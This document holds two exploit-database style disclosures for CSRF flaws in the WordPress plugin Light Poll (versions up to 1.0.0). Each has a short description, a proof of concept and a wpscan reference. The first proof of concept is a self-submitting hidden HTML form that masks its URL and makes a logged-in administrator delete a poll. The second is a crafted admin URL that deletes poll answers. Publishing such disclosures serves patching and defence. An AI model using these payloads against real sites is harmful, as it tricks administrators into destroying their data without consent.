# Exploit Title: Light Poll <= 1.0.0 - Polls Deletion via CSRF
# Date: 05-04-2024
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/light-poll/
# Version: <=1.0.0
# Tested on: Firefox
# Contact me: [email protected]
Description
The plugin does not have CSRF checks when deleting polls, which could allow
attackers to make logged in users perform such action via a CSRF attack
Proof of Concept
<html>
  <body>
    <form action="http://localhost/wp-admin/admin.php">
      <input type="hidden" name="page" value="lp_settings" />
      <input type="hidden" name="task" value="remove" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Reference:
https://wpscan.com/vulnerability/d598eabd-a87a-4e3e-be46-a5c5cc3f130e/
# Exploit Title: Light Poll <= 1.0.0 - Poll Answers Deletion via CSRF
# Date: 05-04-2024
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/light-poll/
# Version: <=1.0.0
# Tested on: Firefox
# Contact me: [email protected]
Description
The plugin does not have CSRF checks in some places, which could allow
attackers to make logged in users perform unwanted actions via CSRF attacks
Proof of Concept
Where <<POLL_ID>> and <<ANSWER_ID>> are valid:
https://example.com/wp-admin/admin.php?page=poll_settings&task=remove_answer&id=
<<POLL_ID>>&answer_id=<<ANSWER_ID>>
Reference:
https://wpscan.com/vulnerability/d1449be1-ae85-46f4-b5ba-390d25b87723/